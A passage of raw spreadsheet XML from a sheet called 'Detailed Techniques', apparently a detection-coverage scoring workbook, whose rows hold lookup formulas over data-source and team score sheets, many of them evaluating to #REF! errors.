        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K32" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L32" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M32" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N32" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O32" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P32" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q32" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R32" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S32" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T32" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U32" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V32" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W32" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X32" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y32" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="33" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A33" s="8" t="s">
        <v>133</v>
      </c>
      <c r="B33" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C33" s="8" t="s">
        <v>418</v>
      </c>
      <c r="D33" s="10" t="s">
        <v>419</v>
      </c>
      <c r="E33" s="10" t="s">
        <v>420</v>
      </c>
      <c r="F33" s="10" t="s">
        <v>421</v>
      </c>
      <c r="G33" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K33,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H33" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I33" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J33" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K33" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L33" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M33" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N33" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O33" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P33" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q33" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R33" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S33" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T33" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U33" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V33" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W33" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X33" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F33&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F33))-LEN(SUBSTITUTE(TRIM(F33),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y33" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="34" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A34" s="8" t="s">
        <v>138</v>
      </c>
      <c r="B34" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C34" s="8" t="s">
        <v>422</v>
      </c>
      <c r="D34" s="10" t="s">
        <v>423</v>
      </c>
      <c r="E34" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F34" s="10" t="s">
        <v>425</v>
      </c>
      <c r="G34" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K34,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H34" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I34" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J34" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K34" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L34" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M34" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N34" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O34" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P34" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q34" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R34" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S34" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T34" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U34" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V34" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W34" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X34" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F34&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F34))-LEN(SUBSTITUTE(TRIM(F34),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y34" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="35" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A35" s="8" t="s">
        <v>127</v>
      </c>
      <c r="B35" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C35" s="8" t="s">
        <v>426</v>
      </c>
      <c r="D35" s="10" t="s">
        <v>427</v>
      </c>
      <c r="E35" s="10" t="s">
        <v>428</v>
      </c>
      <c r="F35" s="10" t="s">
        <v>429</v>
      </c>
      <c r="G35" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K35,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H35" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I35" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J35" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K35" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L35" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M35" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N35" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O35" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P35" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q35" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R35" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S35" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T35" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U35" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V35" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W35" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X35" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F35&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F35))-LEN(SUBSTITUTE(TRIM(F35),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y35" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="36" spans="1:25" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A36" s="8" t="s">
        <v>147</v>
      </c>
      <c r="B36" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C36" s="8" t="s">
        <v>430</v>
      </c>
      <c r="D36" s="10" t="s">
        <v>431</v>
      </c>
      <c r="E36" s="10" t="s">
        <v>432</v>
      </c>
      <c r="F36" s="10" t="s">
        <v>433</v>
      </c>
      <c r="G36" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K36,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H36" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I36" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J36" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K36" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L36" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M36" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N36" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O36" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P36" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q36" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R36" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S36" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T36" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U36" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V36" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W36" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X36" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F36&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F36))-LEN(SUBSTITUTE(TRIM(F36),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y36" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="37" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A37" s="8" t="s">
        <v>196</v>
      </c>
      <c r="B37" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C37" s="8" t="s">
        <v>434</v>
      </c>
      <c r="D37" s="10" t="s">
        <v>435</v>
      </c>
      <c r="E37" s="10" t="s">
        <v>436</v>
      </c>
      <c r="F37" s="10" t="s">
        <v>437</v>
      </c>
      <c r="G37" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K37,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H37" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I37" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J37" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K37" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L37" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M37" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N37" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O37" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P37" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q37" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R37" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S37" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T37" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U37" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V37" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W37" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X37" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F37&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F37))-LEN(SUBSTITUTE(TRIM(F37),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y37" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
